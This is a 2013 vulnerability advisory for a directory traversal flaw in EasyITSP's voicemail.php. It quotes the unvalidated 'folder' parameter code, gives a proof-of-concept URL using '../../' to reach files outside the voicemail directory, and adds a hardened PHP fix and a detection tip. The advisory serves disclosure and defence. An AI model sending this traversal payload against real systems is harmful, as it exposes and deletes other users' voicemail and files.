Directory Traversal - EasyITSP <= 2.0.7

2013-02-11T00:00:00
ID SECURITYVULNS:DOC:29041
Type securityvulns
Reporter Securityvulns
Modified 2013-02-11T00:00:00

Description

Directory Traversal - EasyITSP <= 2.0.7

EasyITSP - Telephone System VoIP

http://blaszczakm.blogspot.com Michal Blaszczak

Affected functionality: Search/Read/Delete of .txt files and Search/Play/Delete of .wav files (voicemail).

file: voicemail.php line: 220

foreach (glob("$vmdir/$_SESSION[phone]/$vmfolder/*.txt") as $filename) { // $vmfolder is used unvalidated in the path

file: voicemail.php line: 186 - 190

if(isset($_GET['folder'])) { $vmfolder = $_GET['folder']; } else { $vmfolder = "INBOX"; } // folder name taken straight from the query string

POC: http:///easyitsp/WEB/customer/voicemail.php?currentpage=phones&folder=../../
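One way to close the hole described above, as an added example that is not EasyITSP's own code: the folder name from the query string is checked against an allow-list, and the resolved path is then confirmed to lie inside the caller's own mailbox. The set of folder names and the use of $vmdir and $_SESSION['phone'] as in the original are assumptions.

```php
<?php
// Added example, not from EasyITSP. Hardened replacement for the folder
// handling in voicemail.php lines 186-190 and the glob() at line 220.

function resolveVoicemailFolder(string $vmdir, string $phone, ?string $requested): string
{
    // Allow-list of mailbox folder names (assumed set; adjust to the deployment).
    $allowed = ['INBOX', 'Old', 'Work', 'Family', 'Friends'];
    $folder  = $requested ?? 'INBOX';
    if (!in_array($folder, $allowed, true)) {
        throw new InvalidArgumentException('unknown voicemail folder');
    }

    // The phone number is also part of the path; accept digits only.
    if (!preg_match('/^[0-9]+$/', $phone)) {
        throw new InvalidArgumentException('invalid mailbox id');
    }

    // Defence in depth: resolve both paths and confirm the folder is still
    // below the mailbox, so "../" sequences or symlinks cannot escape it
    // even if the allow-list is later loosened.
    $mailbox = realpath($vmdir . '/' . $phone);
    $target  = ($mailbox !== false) ? realpath($mailbox . '/' . $folder) : false;
    if ($mailbox === false || $target === false
        || strncmp($target, $mailbox . DIRECTORY_SEPARATOR, strlen($mailbox) + 1) !== 0) {
        throw new RuntimeException('folder not found or outside mailbox');
    }
    return $target;
}

// Usage in place of the original lines 186-190 and 220.
try {
    $vmfolder = resolveVoicemailFolder($vmdir, $_SESSION['phone'], $_GET['folder'] ?? null);
} catch (Exception $e) {
    http_response_code(400);
    exit('invalid folder');
}
foreach (glob("$vmfolder/*.txt") as $filename) {
    // list the message as before; $filename is now guaranteed to be inside the mailbox
}
```

Requests rejected by the allow-list (HTTP 400 with a folder parameter containing "../") are worth logging, since they are a direct indicator of traversal attempts against this endpoint.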

Michal Blaszczak http://blaszczakm.blogspot.com